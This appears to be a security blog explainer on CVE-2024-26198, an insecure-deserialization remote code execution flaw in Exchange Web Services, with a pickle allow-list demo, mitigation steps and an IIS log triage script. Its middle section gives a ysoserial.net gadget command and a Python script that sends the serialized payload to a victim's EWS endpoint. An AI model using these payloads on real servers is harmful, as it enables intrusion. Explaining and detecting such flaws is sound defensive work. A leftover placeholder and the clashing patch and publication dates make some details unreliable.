In February 2024, Microsoft patched a critical remote code execution (RCE) bug in Microsoft Exchange Server, tracked as CVE-2024-26198. This vulnerability could let an unauthenticated attacker run code on affected servers—putting emails, user accounts, and sensitive business info at risk. In this post, we’ll break down how CVE-2024-26198 works, see some example code snippets, show how attackers might exploit it, and discuss how to protect yourself.

What is CVE-2024-26198?

CVE-2024-26198 is a Remote Code Execution vulnerability found in Microsoft Exchange Server (versions 2016 and 2019). According to Microsoft’s Security Guide, the flaw allows attackers to send specially crafted requests to Exchange, resulting in arbitrary code execution in the context of the server.

- Affected Versions: Microsoft Exchange Server 2016, 2019
- Attack Vector: Remote/Network (no authentication required)

How Does the Vulnerability Work?

The core issue in CVE-2024-26198 is an insecure deserialization vulnerability in the Exchange Web Services (EWS) component. Exchange sometimes takes user-supplied input and deserializes it without proper validation. If an attacker sends a malicious payload to this endpoint, Exchange might execute attacker-controlled code.

> Insecure deserialization is when software reads in data structures from untrusted sources without checking for code or values that might trigger unintended actions.
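To make the deserialization point concrete in a language that runs anywhere, here is an added example (not code from the original post, and not Exchange's own .NET BinaryFormatter) using Python's pickle, which has the same property: the serialized bytes name the callable that gets invoked on load. The names RestrictedUnpickler, safe_loads, naive_loads, ALLOWED_GLOBALS and _CallsBack are chosen for this example; os.getcwd is a harmless stand-in for the callable a real payload would name. The hardened loader follows the allow-list pattern from the Python standard library documentation for pickle.

```python
import io
import os
import pickle

# Allow-list of (module, name) pairs that may be resolved while loading untrusted
# bytes. Protocol 4+ encodes plain containers as opcodes, so for a dict of
# strings and ints find_class() is never even reached; any callable named in the
# data (os.system, subprocess.Popen, ...) is refused before it can run.
ALLOWED_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("builtins", "str"),
    ("builtins", "int"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global outside ALLOWED_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused to resolve {module}.{name}")


def naive_loads(data: bytes):
    """The insecure pattern: construct whatever the bytes ask for."""
    return pickle.loads(data)


def safe_loads(data: bytes):
    """The hardened pattern: same format, but constrained to the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class _CallsBack:
    """Constructed sample object whose pickle says 'call os.getcwd() on load'.

    os.getcwd is harmless; the point is that the data chooses the callable.
    """

    def __reduce__(self):
        return (os.getcwd, ())


# Constructed sample inputs: one ordinary record, one that names a callable.
BENIGN_PAYLOAD = pickle.dumps({"mailbox": "alice", "unread": 3})
CALLBACK_PAYLOAD = pickle.dumps(_CallsBack())


def classify(data: bytes) -> str:
    """Report whether the hardened loader accepts or rejects a payload."""
    try:
        safe_loads(data)
        return "accepted"
    except pickle.UnpicklingError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    # The naive loader silently runs the callable and returns its result.
    print("naive:", naive_loads(CALLBACK_PAYLOAD))
    # The restricted loader refuses the same bytes.
    print("benign   ->", classify(BENIGN_PAYLOAD))
    print("callback ->", classify(CALLBACK_PAYLOAD))
```

The allow-list is the whole defense: a deserializer that resolves arbitrary type names from untrusted input is the condition the post describes, and the fix is to refuse names the application did not expect rather than to try to spot "bad" payloads.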

Here’s a simplified step-by-step look at how an attacker could exploit CVE-2024-26198:

1. Identify Target: Attackers find an Exchange EWS endpoint (usually /EWS/Exchange.asmx).
2. Craft Serialized Payload: The attacker creates a malicious .NET serialized object that, when deserialized, runs code such as launching a web shell or reverse shell.
3. Send Malicious Request: The payload is sent to the vulnerable endpoint as part of a SOAP request.
4. Execute Code: The malicious object is deserialized and executed, giving the attacker code execution on the Exchange Server.

Example Exploit (Pseudo-code)

Below is simplified Python code (for educational purposes only) to illustrate how an attack could work. Do not try this on any system you do not own!

Step 1: Craft the Malicious Payload

You’d need to use a tool like ysoserial.net to create a malicious .NET serialized object. For example, to create a payload that executes cmd.exe:

ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o raw -c "cmd.exe /c calc.exe" > payload.bin

Step 2: Send the Payload

Here’s a Python snippet to send the payload in a SOAP request:

import requests

# EWS endpoint on the target host
target_url = "https://victim.exchange.server/EWS/Exchange.asmx"

# Serialized object produced by ysoserial.net in Step 1
with open("payload.bin", "rb") as f:
    evil_payload = f.read()

# Wrap the payload in a SOAP envelope (illustrative element names, not Exchange's real schema)
soap_envelope = f"""
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <DeserializationAttack xmlns="http://example.com/">
      <SerializedObject>{evil_payload.hex()}</SerializedObject>
    </DeserializationAttack>
  </soap:Body>
</soap:Envelope>
"""

headers = {
    "Content-Type": "text/xml"
}

# verify=False skips TLS certificate validation
response = requests.post(target_url, data=soap_envelope, headers=headers, verify=False)
print(response.text)

> Note: The real attack would need to match the correct SOAP method and serialization format used by Exchange. This is just illustrative.

Evidence of exploitation would typically show up as unexpected requests in IIS logs, for example:

POST /EWS/Exchange.asmx 443 - 1.2.3.4 - 500

Unusual .NET errors or unexplained system processes (like cmd.exe or powershell.exe running as the NETWORK SERVICE account) can also be a clue.

Mitigation

1. Patch Immediately: Microsoft released a fix for CVE-2024-26198 in February 2024 Patch Tuesday. Get patches here.
2. Restrict EWS Access: If possible, limit external access to EWS endpoints (firewall rules, VPN, etc.).
3. Monitor Logs: Check for unusual POST requests to /EWS/Exchange.asmx.
4. Endpoint Application Control: Use process whitelisting to block unexpected commands from running as the Exchange service account.
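The IIS-log evidence described above and the "Monitor Logs" step both come down to the same triage: pull POST requests to /EWS/Exchange.asmx out of the W3C log and flag the ones that are anonymous, come from outside the internal ranges, or end in a 5xx. The following is an added example (not from the original post or from Microsoft) that does this over a small constructed log; parse_w3c, suspicious_ews_requests, summarize, INTERNAL_NETS and the sample lines are all assumptions made for the example, and the internal address ranges must be replaced with the organization's own.

```python
from collections import Counter
from ipaddress import ip_address, ip_network

# Constructed sample in IIS W3C extended log format (not real traffic).
# Field order comes from the #Fields directive, as in real IIS logs.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem s-port c-ip cs-username sc-status
2024-03-12 10:00:01 POST /EWS/Exchange.asmx 443 10.0.0.21 CORP\\alice 200
2024-03-12 10:00:05 GET /owa/ 443 10.0.0.22 CORP\\bob 200
2024-03-12 10:01:10 POST /EWS/Exchange.asmx 443 1.2.3.4 - 500
2024-03-12 10:01:11 POST /EWS/Exchange.asmx 443 1.2.3.4 - 500
2024-03-12 10:01:12 POST /ews/exchange.asmx 443 1.2.3.4 - 500
2024-03-12 10:02:00 POST /EWS/Exchange.asmx 443 10.0.0.21 CORP\\alice 200
"""

# Assumed internal ranges; replace with the real ones for your environment.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]
EWS_PATH = "/ews/exchange.asmx"  # compared case-insensitively (IIS paths are)


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue  # other directives and blank lines
        if fields is None:
            raise ValueError("data line before #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed or truncated line; skip rather than misalign
        yield dict(zip(fields, values))


def is_internal(ip):
    try:
        addr = ip_address(ip)
    except ValueError:
        return False  # unparseable client address is treated as external
    return any(addr in net for net in INTERNAL_NETS)


def suspicious_ews_requests(text):
    """Return (client ip, timestamp, reasons) for EWS POSTs worth a second look."""
    hits = []
    for rec in parse_w3c(text):
        if rec["cs-method"] != "POST" or rec["cs-uri-stem"].lower() != EWS_PATH:
            continue
        reasons = []
        if rec["sc-status"].startswith("5"):
            reasons.append("server-error")
        if rec["cs-username"] == "-":
            reasons.append("unauthenticated")
        if not is_internal(rec["c-ip"]):
            reasons.append("external-source")
        if reasons:
            hits.append((rec["c-ip"], f"{rec['date']} {rec['time']}", reasons))
    return hits


def summarize(text):
    """Count flagged EWS POSTs per client address, for prioritizing follow-up."""
    return Counter(ip for ip, _, _ in suspicious_ews_requests(text))


if __name__ == "__main__":
    for ip, when, reasons in suspicious_ews_requests(SAMPLE_LOG):
        print(when, ip, ",".join(reasons))
    print(dict(summarize(SAMPLE_LOG)))
```

Treat the output as a triage list, not a verdict: healthy EWS clients do occasionally produce 5xx responses, so the combination of anonymous, external and failing is what should move a source address to the top of the queue, and it should then be correlated with the process-creation evidence mentioned above (cmd.exe or powershell.exe spawned by the Exchange worker process).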

References

- Microsoft Security Response Center – CVE-2024-26198
- Zero Day Initiative Advisory *(Replace with actual number when available)*
- ysoserial.net – Deserialization Exploits
- Exchange Server Support

Conclusion

CVE-2024-26198 highlights the persistent risk of insecure deserialization in business-critical software like Microsoft Exchange. Organizations running Exchange Server should prioritize patching, keep their endpoints monitored, and be mindful of exposing sensitive services to the internet. Bad actors can and will leverage these vulnerabilities if left unaddressed—so act fast.

Timeline

Published on: 03/12/2024 17:15:58 UTC
Last modified on: 03/12/2024 17:46:17 UTC